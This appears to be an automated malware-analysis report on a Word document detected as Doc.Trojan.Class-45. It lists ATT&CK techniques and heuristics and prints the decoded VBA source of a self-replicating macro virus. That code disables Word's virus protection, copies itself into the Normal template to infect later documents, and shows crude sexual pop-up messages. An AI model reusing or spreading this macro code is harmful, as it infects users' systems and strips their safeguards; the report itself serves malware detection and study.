MALICIOUS
202
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains legacy WordBasic macro virus markers and actively uses VBA macros, including AutoOpen and Auto_Close, to infect the Normal template. The script attempts to export its code to 'c:\Clinton.sys' and then inject it into the Normal template, indicating a macro-based infection attempt. The ClamAV detection 'Doc.Trojan.Class-45' further supports the malicious nature of the file.
Heuristics 6
-
ClamAV: Doc.Trojan.Class-45 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Class-45
-
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUSOLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.abcnews.com/ In document text (OLE body)
- http://www.msnbc.com/In document text (OLE body)
- http://www.cnn.com/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1844 bytes |
SHA-256: da5ca0dfcfa03f91ecc884fb711d21fc7332b4dde35beea35ff9392ed0a05f1f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error GoTo out
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Options.ConfirmConversions = False
Clintons = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
Clintonr = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
If Clintonr > 70 And Clintons > 0 Then GoTo out
If Clintonr < 70 Then
Set Monica = NormalTemplate.VBProject.VBComponents.Item(1)
ActiveDocument.VBProject.VBComponents.Item(1).Name = Monica.Name
ActiveDocument.VBProject.VBComponents.Item(1).Export "c:\Clinton.sys"
End If
If Clintons = 0 Then Set Monica = ActiveDocument.VBProject.VBComponents.Item(1)
Infection = Int(Rnd * 100)
If Infection = 99 Then MsgBox "Monica Blows Clinton! -=News@11=-"
If Day(Now) = 17 And (Month(Now) > 8) Then MsgBox "Today is Clinton & Monica Fuck-Fest Day!"
Monica.codemodule.AddFromFile ("c:\Clinton.sys")
With Monica.codemodule
For x = 1 To 4
.deletelines 1
Next x
End With
If Clintonr < 70 Then
With Monica.codemodule
.replaceline 1, "Sub AutoClose()"
.replaceline 75, "Sub ToolsMacro()"
End With
End If
With Monica.codemodule
For x = 2 To 72 Step 2
.replaceline x, "'" & Application.UserName & Now & Application.ActivePrinter & Application.ActiveWindow
Next x
End With
out:
If Clintonr > 70 And Clintons = 0 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub
Sub ViewVBCode()
'Word97/Class.Clinton by Virus, Thanks Vic.
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.